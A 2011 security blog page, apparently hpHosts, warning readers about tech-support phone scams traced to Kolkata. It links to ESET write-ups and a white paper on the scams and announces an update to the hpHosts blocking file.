The People's Flag Is Deepest Red

So I asked him how he knew that my system was infected. He explained that my IP address was flashing red on his screen. I asked him what my IP address was, and he explained that he couldn't tell me that for security reasons, but he'd put me through to his supervisor.


Read the full story over at the Eset blog;

http://blog.eset.com/2011/03/04/heres-my-support-desk

References:

Info: Telephone scammers still coming to a phone near you!
http://hphosts.blogspot.com/2011/03/info-telephone-scammers-still-coming-to.html

Thursday 3 March 2011

Info: Telephone scammers still coming to a phone near you!

Myself and others have been reporting on and following, the telephony based scams which for now, are being traced back to "companies" in Kolkata, India, for quite some time now.

I'm sorry to say (but definitely not surprised), these scammers are still targeting people around the world, with reports coming in quite frequently to places such as digitaltoast.co.uk (warning, due to the page size, it may freeze your browser whilst it loads), with the last one as little as two hours ago, from someone in Canada.

Sadly, not many seem to be mentioning the sites they were pointed to, but the latest one that was mentioned, was techesupport.co.cc, hosted by USA based, HostNOC at IP 184.82.73.38. Surprised to see .co.cc being used? Nope, neither am I. Along with dot.tk, cz.cc etc, .co.cc is a favourite amongst the criminal crowd as it's free.

The primary concern to try and put a stop to this, other than actually arresting the criminals (wondering why the LE in India haven't put a stop to it themselves??), is to try and warn as many people as possible - your family, friends, friends of friends, work colleagues ... you get the picture. On this note, my good friend over at Eset, David Harley has written a paper (and thank you for the mention David!) you can print out and give them, that contains alot of information on these scams, and of course, what to look out for so you can avoid them.

Where’s your IT support desk when you need it?
http://blog.eset.com/2011/03/03/wheres-your-it-support-desk-when-you-need-it

The paper itself can be found at the following, listed under "Eset white papers";

http://www.eset.com/us/documentation/white-papers

Title: Hanging on the Telephone
Authors: David Harley, Urban Schrott and Jan Zeleznak, February 2011
Short description: As if fake anti-virus products weren’t bad enough, nowadays we have unsolicited phone-calls from fake AV helpdesks. ESET researchers tell you more about support scams.

Download the paper, give it a good read, and make sure you pass a copy on to friends, relatives, colleagues, and anyone else you can think of. Have a word with your local media and see if they'll publicize it too.

References

Support Scams: Even More Personal
http://blog.eset.com/2010/12/16/support-scams-even-more-personal

Fake Support: the War Drags On
http://blog.eset.com/2010/11/18/fake-support-the-war-drags-on

Marketing Misusing ESET’s Name
http://blog.eset.com/2010/06/23/marketing-misusing-esets-name

techonsupport.com, click4rescue.com, pcrescueworld.com: SupportOnClick revisited
http://hphosts.blogspot.com/2009/12/techonsupportcom-click4rescuecom.html

SupportOnClick: Phoned by Malwarebytes? BigPond? Anyone else?

http://hphosts.blogspot.com/2009/07/supportonclick-phoned-by-malwarebytes.html

SupportOnClick Update
http://hphosts.blogspot.com/2009/04/supportonclick-update.html

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

Fake tech support call scam - prefetch virus logmein123.com
http://www.digitaltoast.co.uk/fake-tech-support-call-scam-prefetch-virus-logmein123com

New scam - They call you by phone!
http://www.malwarebytes.org/forums/index.php?showtopic=11156

Staffordshire Council - Telephone computer support warning (PDF)
http://www.staffordshire.gov.uk/NR/rdonlyres/6997DBB0-E31E-4AFB-A886-C9DDEE114204/90090/TelephoneComputerSupportWarning.pdf

Cold call scam warns of virus infection
http://www.h-online.com/security/Cold-call-scam-warns-of-virus-infection--/news/112893

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

Tuesday 1 March 2011

hpHOSTS: Updated March 2011

hpHOSTS - Updated March 2011

The hpHOSTS Hosts file has been updated. There is now a total of 122,276 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 02/03/2011 00:00
  2. Last Verified: 01/03/2011 16:00
Download hpHosts now!
http://hosts-file.net/?s=Download